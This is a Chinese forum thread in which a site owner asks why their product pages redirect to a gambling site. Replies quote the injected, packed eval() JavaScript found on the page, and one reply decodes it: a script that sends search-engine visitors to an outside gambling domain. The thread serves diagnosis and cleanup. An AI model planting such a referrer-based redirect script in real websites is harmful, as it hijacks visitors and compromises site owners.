网站被挂马，插跳转。哪位大神能帮我看看？

wife8114 · 发表于 2018-8-10 18:20:07

http://www.sirasun.com/
点击两个产品，页面就跳转到一个赌 bo网站了。
大佬们能指定一二吗？

LOC论坛最屌MJJ · 发表于 2018-8-10 18:40:50

本帖最后由 LOC论坛最屌MJJ 于 2018-8-10 18:44 编辑

这种是肯定是要付红包才能搞定的啦

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.4("<5 d=\\"c\\">");3.4("e 1=3.g");3.4("f(1.2(\\"b\\")>0 || 1.2(\\"7\\")>0 || 1.2(\\"6\\")>0 ||1.2(\\"8\\")>0 ||1.2(\\"a\\")>0 ||1.2(\\"9\\")>0 ||1.2(\\"n\\")>0 ||1.2(\\"q\\")>0 )");3.4("m.i=\\"h://j.l.k/p.o\\";");3.4("</5>");',27,27,'|s|indexOf|document|writeln|script|soso|sogou|sm|bing|uc|baidu|Javascript|LANGUAGE|var|if|referrer|http|href|you|vip|wangtou888|location|yahoo|html|index|so'.split('|'),0,{}))</script>

这个看起来怪怪的，另外asp之前的代码看不到有可能产品页的asp里面还有跳转

bob1987 · 发表于 2018-8-10 18:42:24

提示: 作者被禁止或删除内容自动屏蔽

fifalan · 发表于 2018-8-10 21:14:52

jshkk · 发表于 2018-8-10 21:42:09

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.4("<5 d=\"c\">");3.4("e 1=3.g");3.4("f(1.2(\"b\")>0 || 1.2(\"7\")>0 || 1.2(\"6\")>0 ||1.2(\"8\")>0 ||1.2(\"a\")>0 ||1.2(\"9\")>0 ||1.2(\"n\")>0 ||1.2(\"q\")>0 )");3.4("m.i=\"h://j.l.k/p.o\";");3.4("</5>");',27,27,'|s|indexOf|document|writeln|script|soso|sogou|sm|bing|uc|baidu|Javascript|LANGUAGE|var|if|referrer|http|href|you|vip|wangtou888|location|yahoo|html|index|so'.split('|'),0,{}))

复制代码

解码后：：

document.writeln("<script LANGUAGE="Javascript">");document.writeln("var s=document.referrer");document.writeln("if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )");document.writeln("location.href="http://you.wangtou888.vip/index.html";");document.writeln("</script>");

复制代码

然后就跳转到了http://you。wangtou888。vip/index.html

Vhc · 发表于 2018-8-10 21:51:27

提示: 作者被禁止或删除内容自动屏蔽

只看该作者 · 发表于 2018-8-10 21:59:07

提示: 作者被禁止或删除内容自动屏蔽

wife8114 · 发表于 2018-8-10 22:24:12

bob1987 发表于 2018-8-10 18:42
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!' ...

有什么靠谱的php程序，求推荐。
就是这段js，感谢。

wife8114 · 发表于 2018-8-10 22:27:20

jshkk 发表于 2018-8-10 21:42
解码后：：

然后就跳转到了http://you。wangtou888。vip/index.html

感谢，直接命中要害！

Network · 发表于 2018-8-10 22:43:18

提示: 作者被禁止或删除内容自动屏蔽

		自动登录	找回密码
密码			注册

bob1987 bob1987 当前离线积分 5371	3^# 发表于 2018-8-10 18:42:24 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
bob1987 bob1987 当前离线积分 5371
	回复支持反对举报

Vhc Vhc 当前离线积分 25457	6^# 发表于 2018-8-10 21:51:27 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
Vhc Vhc 当前离线积分 25457
	回复支持反对举报

怪人该用户已被删除	7^# 发表于 2018-8-10 21:59:07 来自手机 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
怪人该用户已被删除
	回复举报

Network Network 当前离线积分 155	10^# 发表于 2018-8-10 22:43:18 来自手机 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
Network Network 当前离线积分 155
	回复支持反对举报

[Windows VPS] 网站被挂马，插跳转。哪位大神能帮我看看？